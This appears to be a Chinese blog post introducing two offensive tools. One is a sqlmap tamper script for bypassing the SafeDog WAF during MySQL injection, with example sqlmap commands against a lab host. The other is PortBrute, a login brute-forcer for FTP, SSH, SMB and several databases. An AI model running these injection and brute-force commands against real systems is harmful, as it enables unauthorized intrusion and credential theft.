MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog,以及端口爆破工具 -- PortBrute配置使用

工具介绍

此Tamper仅仅适用于MySQL数据库,在SQLMap使用过程中添加参数--tamper=MySQLByPassForSafeDog。

安装与使用

1、安装网站安全狗Apache最新版

2、启用安全狗,不加MySQLByPassForSafeDog绕狗Tamper:

clike 复制代码
python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql

3、启用安全狗,添加MySQLByPassForSafeDog绕狗Tamper:

clike 复制代码
python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog

4、绕过POC

可以添加参数-v 3进行学习查看

clike 复制代码
python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog -v 3

下载地址

项目地址:https://github.com/Tas9er/MySQLByPassForSafeDog


端口爆破工具 -- PortBrute配置使用

一、简介

一款跨平台小巧的端口爆破工具,支持爆破FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD。

二、使用方法

1、ip.txt中放入需要爆破的ip+端口,比如 10.10.10.10:3306。如果不是标准端口,比如3307是MYSQL。写成 10.10.10.10:3307|MYSQL。其他FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD同理

2、Windows/MAC/Linux已经打包好了,分别对应(PortBruteWin.exe/PortBruteMac/PortBruteLinux)。无论是内网渗透,还是日常使用,直接下载下来就可以直接用。

三、下载地址

1、通过该项目地址下载:https://github.com/awake1t/PortBrute

相关推荐
weixin_478689766 分钟前
操作系统【2】【内存管理】【虚拟内存】【参考小林code】
数据库·nosql
weixin_472339461 小时前
网络安全之重放攻击:原理、危害与防御之道
安全·web安全
sam.li1 小时前
WebView安全实现(一)
android·安全·webview
weixin_472339461 小时前
网络安全之注入攻击:原理、危害与防御之道
安全·web安全
九皇叔叔1 小时前
【7】PostgreSQL 事务
数据库·postgresql
kk在加油1 小时前
Mysql锁机制与优化实践以及MVCC底层原理剖析
数据库·sql·mysql
合作小小程序员小小店1 小时前
web网页开发,在线%ctf管理%系统,基于html,css,webform,asp.net mvc, sqlserver, mysql
mysql·sqlserver·性能优化·asp.net·mvc
Kookoos1 小时前
ABP VNext + Cosmos DB Change Feed:搭建实时数据变更流服务
数据库·分布式·后端·abp vnext·azure cosmos
JosieBook1 小时前
【Java编程动手学】Java常用工具类
java·python·mysql
hello 早上好2 小时前
MsSql 其他(2)
数据库·mysql